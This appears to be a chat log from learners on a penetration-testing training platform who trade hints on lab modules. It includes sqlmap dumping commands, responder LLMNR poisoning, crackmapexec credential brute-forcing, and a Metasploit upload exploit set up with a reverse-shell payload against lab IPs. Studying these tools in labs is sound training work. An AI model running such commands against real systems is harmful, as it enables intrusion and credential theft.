Always use small lists for subbrute. Never use large lists. They may not contain what you are looking for
Can someone help me with these two questions am stuck
- open the "Search & Reporting" application, and find through an SPL search against all 4624 events the count of distinct computers accessed by the account name SYSTEM.
- SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes
Each module costs cubes
For Tier 0 modules you get 10 cubes back each time you complete them. You can then use this to buy another module for 10 cubes (Tier 0)
Yeah I have checked ANY and TXT for those as well. I am running a new one with names_small.txt
Ok bro but I have 63 cubes now, but I still can't unlock a module which costs only 10 cubes
disable AdBlocker
Ok I'll try this
try a different list
Thank you, it works
Hi all, currently in Windows Event Logs & Finding Evil Module for SOC analyst role.
I've modified and saved the file on host machine but I'm not sure how to transfer that into the RDP machine.
Do I need to config and save the xml file in the RDP machine instead?
i have also tried to read in the module but cant find anything that might help
What exactly have you tried?
Which module and which section?
Nvm - I'm dumb. I found the file in the spawned VM lol
splunk introduction
I have tried
EventCode=4624 Account_Name=SYSTEM
| stats dc(Computer) as Distinct_Computers
subbrute only came with names.txt and names_small.txt
Look again in the module.
There are other options
can someone explain this special marker to me a bit more for sqlmap?
so basically if you just know the uid you can use this special marker to guess or run through other stuff?
of course the image wont load lol
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'
the * part
that's just to tell sqlmap where to inject
can anyone help me with the pivoting skill assessment, i got the credentials and private key, but every time i ssh to the server i get wrong password
where to inject what exactly? the vulnerability it finds?
inject the sql injection queries
ahh gotcha, thank you
it will parse and try to find the injection point on its own, but if you're sure where it is, specifying would make it a lot faster
i tried running without the special marker but it didnt work at all
Hey anyone
I got password attacks lab hard the back.vhd file onto pwn box now trying to Crack it
Getting error while extracting data message
Im doing the filter contents module and i cant remember where they explained cURL in linux fundamentals. i googled and got a small understanding but what does each part of this command i found on the forums do?
Did you figure this out? Looks like you missed a key piece of information in the module.
Bitlocker2john
Then maybe the file got corrupted while transferring
I was wondering, does it take a lot of time to transfer?
It shouldn't considering what's actually on it
A couple minutes at most
Xfreerdp has the /drive: option to mount for easier transfer
Sounds like your connection might be shaky
Do a checksum on it: md5sum in linux and Get-Filehash in powershell
Mm
why does sqlmap -u "http://94.237.58.224:34083/case5.php?id=1" --batch --dump --no-cast -T flag5 --level=5 --risk=3
this take soo long?? like 40 min sqlmap
SQLMap Essentials - Attack Tuning - case 5
look at the level and risk you provided in your command.. that's going to take forever to finish
why doesnt sqlmap case 5 flag work for me?
because it's not good.
its the flag?
Yeah. On my side it's slightly different.
Hey, I'm working on File Upload Attacks - Limited File Uploads. I managed to exploit the XSS, but when I try to read any content like index.php, upload.php using the XXE payload it didn't work! I have tried to change the directory as mentioned in the section but still no luck, any hint?
I'd delete that, as it still can be an answer
Command Injections - Skills Assessment. I've tested && and ||, but they are considered malicious.
are they same flag u get?
Even if not: it's a flag format so be careful
I'm working on the DIRECTORY ENUMERATION & ATTACKS module atm. I understand that I need to sniff the ens224 interface on the Parrot OS but this interface doesn't exist. Am I missing something here?
type 'ip a' and see what your adapter is called
ifconfig for Linux, and ipconfig for Windows. Check your network adapter names, because on the boxes they might have a different name.
Only eth0 and tun0
so which one do you think your vpn adapter is?
tun0
right
You are doing AD module?
yES
You do it from the target box, not the pwnbox instance
Connect to the target box and do it from there.
ensX is used on the target machines
Basically, your target machine is like a proxy between you and the AD environment.
So, do you have any idea why on the Command Injections - Skills Assessment all operators are considered malicious?
yes, you need to obfuscate the commands
they may be, yes
i don't recall those ones specifically but i remember - being flagged
remember to enumerate what exactly is triggering the block
i tested them individually, without anything else
Is it on 172.16.5.0/23 ? There's nothing in that network
connect to the target box, use ifconfig and you will find the ens*
Is the target box the box that's provided running Parrot OS?
Active Directory Enumeration & Attacks
Initial Enumeration of the Domain
no
Spawn instance and spawn target are completely different
Spawn Instance spawns an instance of the Pwnbox attack box
Spawn target spawns a box (generally) on the 10.129.x.x network for you to attack (which may or may not be networked)
the only way to interact with targets is usually via either ssh or rdp with given creds
So the instruction clearly said sniff eth0, ARP packets make us aware of the hosts: 172.16.5.5, 172.16.5.25, 172.16.5.50, 172.16.5.100, and 172.16.5.125.
though sometimes it's via protocols like winRM/SMB/FTP
yes: sniff it on the target
if your system doesn't have the 172.16.5.x connection: then you won't see this traffic
I did but eth0 is external IP. No ARP here
listen to me carefully
VERY carefully
look JUST above the questions
do you see a 10.129.x.x IP OR Green text that says "Click Here To Spawn Target!"
this ^
in order to perform the exercise you must first connect to the target system
can someone help me, im in the payloads and shells module on the live engagement and when i exploit i get an error saying: no method error undefined method "get_cookies"
i don't ever recall that error; but I do know for one of the exploits you do need to define the vHost
oh
you need to use the provided jump host
and the Lhost will be different for the exploits as well
uh whats that
it's literally how all the modules work
the 10.129.x.x host spawned via the "Spawn Target" button
jump host simply refers to a median host that's used to connect to other devices on a network
Does the device you're using have the same interface as any of the 3 targets?
no, because they are on a separate network
:P
you need to first rdp to the 10.129.x.x target; then carry out the attacks on the hosts
yea im on the rdp
(firefox is installed on that target)
the lhost needs to be on the same network as the target(s)
[-] Exploit failed: NoMethodError undefined method `get_cookies' for nil:NilClass
[*] Exploit completed, but no session was created.
restart msfconsole and reset the options
sometimes it's dumb.
spawning problems known?
some weird artifact of whatever was loaded before
lol now it spawned
Hello everyone. Im doing the getting started module and I got to the section Nibbles - Privilege Escalation, to the part where I have to download the LinEnum.sh script, but when I try to access the link in my pwnbox it doesn't display. Any ideas on how to download the script into my pwnbox?
git clone or wget
try and git clone the .sh file i cant remember the exact url from gh
You don't need it for nibbles
I tried git clone but it times out. Seems like my pwnbox doesn't have internet access
are you sure the tool isn't provided in any directory?
Ill give it a try. Thanks!!
if you want to use that you need to transfer the file yourself. But as others said its really not necessary here, try the basic approaches first.
Thank you all
└──╼ $ sqlmap -u "http://94.237.58.155:55819/case6.php?col=id" --batch --prefix="')" --level=2 --risk=3 --dump
why this mofo taking so long
morning all, still very stuck on the medium challenge https://academy.hackthebox.com/module/112/section/1079 I don't really know where to begin. Looked at enum4linux. Checked metasploit. Im drawing blanks
I have gone back to the smb section of the learning path, because that's where I think I should be focusing, but would love some guidance
can anyone help me with the install of the odat.py file I'm getting an externally-managed-environment error
never mind, apparently it's in the repository and you can just regularly install it
had trouble with it as well. got it from github
and worked fine
Thank you, I would have been on the labs already but I was trying to see what was wrong with the script
I am so stuck
i think at some point it will give you something like:
crypto or something not found:
here is the solution
#858470491676737536 message
This medium level footprinting lab is so tough for me lol
where are you stuck?
lol, I don't really know where to begin. I have run nmap against the ip. I have tried enum4linux. I believe the vulnerability is within smb or rdp but I am just having a world of trouble getting anywhere
i ran nmap with the flag --vuln scripts. got a cve back but didn't get anywhere with it
had to pull out my writeup
No CVEs needed
^
yea smb and rdp are running and something else
i personally didnt go the smb route, i think Marcie went since i think i quickly searched for it after i was done with it
yea Basic enumeration that was written in the Modules
that's all that the footprinting module taught you, so that's all you should go with
I mean I went the manual route for finding the important document when i first went through it; then realized "Oh...smb is running"
still need to enumerate the creds from one of the running services
I have been trying to crack into smb but i can't figure how, I think that's where i went to enum4linux
oh so its only the "Important" document on SMB which is used later on. yea i found that via Server Manager lol
enum4linux is not needed, the target is a Windows Machine anyway
I think the problem i hit was when i enumerated I couldn't find any shares to connect to
and in order to run enum4linux you'd need to be connected to the target
:P otherwise running it locally runs it on your own system
which is about as useful as a chocolate teapot
makes good hot chocolate
not the point
any hints on where I should go back to look at?
scan all the ports
what services have you found?
there's a service you're missing that's not SMB or RDP
except rdp and smb
msrpc?
msrcp thats 135 port?
also to enumerate SMB shares you can just do smbclient.py -L -N //ip/
rpc is still really only useful if you have creds
yes
need creds for it
its worth checking it out
if you haven't checked it out; i'd highly recommend it
maybe something will come out of it! and if you are stuck there because of a permission, reread the module, somewhere it's being explained
thanks guys, you are both really helpful in a not just giving the answer way. It's really appreciated
as i will constantly remind anyone that gets stuck like this:
step 0: enumerate
Always double check that you enumerated all the services you can
create a checklist of services that have the potential to be logged into anonymously
if they're exposed - are they anonymous login? no? check other ports
gonna need to go for a walk to get that one (if you're referencing another lab)
there is an nmap scan that usually comes back with anonymous login allowed or not, I didn't see that this time so I must not have done it properly
well sometimes the scripts are unreliable
don't rely on automation when the manual method can easily confirm or deny ¯\_(ツ)_/¯
yea it took me a while cuz i totally forgot about them. then went for a walk which again i was blind and took me another 30min-1h
lessons learned
i can't tell you how many people have completely missed their keys when going for a walk. I mean it was right there
and imo it can be easily guessed (but that's just from having already completed it)
this is a very hard skill to learn
i can also tell you that I was in the same boat on that lab, spent so long focusing on A... that I didn't realize that B was there until i re-read the engagement brief
this is why it's early in the path
to get you in the habit of doing it
never assume the question is the first step in the journey
a good example of the above point is the password attacks - mutated password section: you're told to get a user's creds and ssh in; but bruteforcing ssh is like pulling teeth
so you have to enumerate for other exposed services
DUDE THANK GOD IM NOT ALONE. i got the key and thought of it just as a normal output, thinking nothing of it. throwing everything above and beyond enumerating other services. till i went and got again the walk hint from this where i told myself, i missed something 100%.....
the palm attaches to the face swiftly
I'm stuck on the advanced xss filter bypass section, I'm able to bypass the filter but I'm not seeing any interaction past that. I can reference the exploit server as the script source and it works fine, but the payload for capturing admin interaction isnt giving me anything
i just went and reread it..... i see what the server was used for LOL
i have managed to mount the nfs and read it. So far I have just found a bunch of empty ticket files
EXACTLY
if only there was a way to search for not-empty files
list them there must be a needle in a haystack
when you say list them, you mean to iterate through and cat their contents?
nope
you can do just ls -la for the quick way
or you can just do a find command with some flags to specify the size
i think like +0 will show any above zero
i use -la everywhere since it shows hidden / . files as well
they catch ya out on one of the modules/sections with that iirc, the entire folder you connect to is all hidden files
and it's like "why is it empty... oh wait"
you mean on the footprinting module or other?
ooh Celia??
thanks, slowly progressing
that might be the one, (i think you misspelt the name)
fun fact: that skill assessment used to not have that user's creds given to you, you had to check the hints for it
yes, that's an interesting ticket for sure
or had to creatively bruteforce
yea just went into my writeups and Ceil had all . files 
that part i dont like. the guessing, same thing happened with the footprinting wordlist. took me ages without any hit, searched for a hint on the internet and saw someone telling did you use the wordlist provided?? and i was like bruh what? they provide you a wordlist?
progress!
resources button goes brr
i try to avoid any hints / resources there until i feel like im really stuck
aren't most resources necessary to complete the module
it do be like that sometimes
sorry guys I need help again, i've been able to connect with smb and found a file with what i think is an admin user, but I am struggling to make the jump in knowledge to where to use this
What section/module?
i gained a username and password. logged in via smb. found a file with a username and creds, but don't know where to apply that
try logging in with that and see what you can access
that's my problem, not sure where to log in. tried logging into smb with those creds, failed
I feel like it's an admin password and user I found since the username was just two letters
check the hint, try it with sql
how do I try it with sql. I am not sure of this
other than smb, how else can you login to access the sql studio gui?
you should know the syntax since it was covered in SQL section
I keep getting a connection refused error
if I remember right you'll need to rdp to target then login to sql with the creds
could be wrong tho, it's been a while
I made some progress today lol. This module is taking me an eternity
try to re rdp
looking now
with new creds
doesn't like the creds i found in the text file, or I am just hitting a wall
Hi guys, need a little hint on the Getting Started module. After the Nibbles box there's a Knowledge Check section; I have submitted both user and root flags through the manual method but I also wanted to do the msf one as well, just to build the understanding, but I'm getting an error while exploiting. I am pretty sure that it has something to do with setting the "TargetURI". I have set it to /admin so that it can authenticate with valid creds as it's an authenticated vuln, however I have also tested /theme/Innovation/template.php as the vuln is related to php code injection. Still getting the error of
[*] Started reverse TCP handler on 10.10.14.88:7777
[*] 10.129.237.195:80 - Authenticating...
[-] 10.129.237.195:80 - Exploit aborted due to failure: no-access: 10.129.237.195:80 - Authentication failed
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/get_simple_cms_upload_exec) > show options
Module options (exploit/unix/webapp/get_simple_cms_upload_exec):

   Name       Current Setting  Required  Description
   PASSWORD   admin            yes       The right password for the provided username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.129.237.195   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /admin           yes       The full URI path to GetSimplecms
   USERNAME   admin            yes       The username that will be used for authentication process
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   LHOST  10.10.14.88      yes       The listen address (an interface may be specified)
   LPORT  7777             yes       The listen port

Exploit target:

   Id  Name
   0   Generic (PHP Payload)

View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/get_simple_cms_upload_exec) > exploit
^ THIS IS WHAT I HAVE DONE
10.129.237.195/admin
try that
yeah I tried that same error
I'm thinking I have done something wrong on TargetURI because other options seems obvious enough I believe
i just finished getting started last week, and have been moving along. you will have a lot of time using msf during the course. dont sweat it if you cant figure it out.
Ah hello
Anyone know how to see the BitLocker encrypted drive on the password attacks hard lab? I rdp'd into that and can't see anything
SQLMap Essentials - OS Exploitation: why can't i access the website?
INTRODUCTION TO DIGITAL FORENSICS-Rapid Triage Examination & Analysis Tools
could anyone help me with this question:
i did not understand the flow yet
Try first getting into a user. There is one that uses that password. I remember i had to get into his account/machine first before i could login into mysql
I manually clicked on every user and put the password in via the alex machine. After i got a hit i used rdp
I can't seem to search for accounts in GPO's in the Searching for Accounts in Group Policy Objects section of the CME module. Getting Netbios errors connecting when I use the commands, both on my kali machine and the pwnbox. I can't move forward with the module.. am I missing something here or is the VM just crapping itself?
try --os-shell flag
the way is in the lesson
or ||running as||
though UAC doesn't like copy/paste
assume information like zone.identifier does not change
I'm doing the Web Server Pivoting with Rpivot.
When I'm trying to backconnect from client to attack host it won't establish a connection. Anyone had the same issues or can see if something is wrong in my syntax?
The IP you've specified doesn't seem to be from tun0 exactly
It is my tun0 address
maybe use sudo?
Tried but with no luck
im blind, it's my tun0
10.10.4.46 != 10.10.14.46
0.0.0.0 just makes it listen on all
Yeah, just noticed that xd
oh i see lol he targeted the wrong ip
Yeah but with the tool right
Hello, for "AD Enumeration & Attacks - Skills Assessment Part II", I get no response from responder, what is wrong? "ssh htb-student@<target>" then "sudo responder -I ens224 -A", but no answers. Can you help me please?
Try adding -v switch for verbose
and run without -A, that puts responder in analyze mode
no change. Perhaps I must adjust the poisoning options?
[+] Poisoning Options:
Analyze Mode [ON]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
Did you run without putting it in Analyze mode?
Good day guys I need a hint or help in Python Library Hijacking in Linux Privesc in HTB academy
If someone in avilable Id be glad
with -A
You gotta wait
A little longer
And also use -v to view the hashes, since when you gotta wait it will display "skipping previously captured hashes" even if you didn't capture any
no hashes with -v
How long did you wait?
Just wait man give it time 10min
That's too much lol
Because that's how long i waited
Maybe not 10 but 5-10
ouch

Also did you remove -A flag?
Looking for someone who's completed the skills assessment lab for Pivoting, Tunneling, and Port Forwarding. I did it but was wondering how the rest of you managed to do it.
I'll try also without -A, thx
Hello, I'm doing the Footprinting lab - medium. I got access with smbclient and found the file, but when I download it, after that !cat is not working and I cannot read the content.
Does the file have any content? How large is the file on the server?
Having issues on the Password Attacks module, no pwns returning when using crackmapexec for the WinRM question
Using lists from the resources
Anyone done this?
yes it has
after using get -
wait a sec
I'm so stupid, it has content, it's just so short I didn't even notice it
responder OK, check the results in /usr/share/responder/logs. Thx
On a bit of a tangent - large files will take longer to fetch and in those instances, adding timeout value might be useful.
Module: PASSWORD ATTACKS
section: Password Attacks Lab - Easy
I have successfully logged in via SSH but can't elevate privileges to root. I also tried brute-forcing but that didn't do anything
On this module also but the network services module
How did you get the winrm question?
I don't remember, did you try "crackmapexec winrm <ip> -u user.list -p password.list"?
Yep, it runs through the username list but doesn't return any owns
Using the user.list and password.list provided
Hello everybody, I am currently on the Hack The Box Academy and I get disconnected all the time when I am connected to RDP. I tried to change / restart my openvpn file
I got this error
Has someone already got this error?
thanks
Well, did you try everything?
That was covered in the section
In Creds Hunting in Linux
I'm sure you missed something so dumb that will lead you to the root password :3
Does someone know if a room exists for the VPN problem? Thanks
Hope you are doing well. I need guidance on the Starting Point Tier 1 machine "Three". Where can I get that?
"network is unreachable" looks like you aren't connected at all
That looks like the vpn output post connection
After connecting to the vpn, can you ping google.com?
I'm saying ping google.com explicitly
Ok
If issues persist, reach out to website support via the green bubble
If you don't see a green bubble on the academy page, disable adblock
I still couldn't find the root password.
Thanks. Finally I restarted everything and it's working.
thanks
Try looking in bash history
And lemme know what you found there
to access #starting-point verify your account -> #welcome
Thank you!
you're welcome :3
can someone help me with crackmapexec - skill assessment?
I'm still stuck on Footprinting Oracle TNS. odat was in the repository so I just apt installed it, but sqlplus is not, and I'm pretty sure I need that to complete this one
Read the install script provided, it uses the sqlplus installs from oracle directly
Anyone Have Fake Virus Script
The install script didn't work for me, I received error messages during the sqlplus install
For what purpose
Trolling Friend XD
That's fairly normal
Bruh Rule 1
Even still: scaring your friend with a fake virus is a dick move
I need help for
ABUSING HTTP MISCONFIGURATIONS
Common Session Variables (Account Takeover)
bypassing the MFA
any help please?
LOL I didn't think about that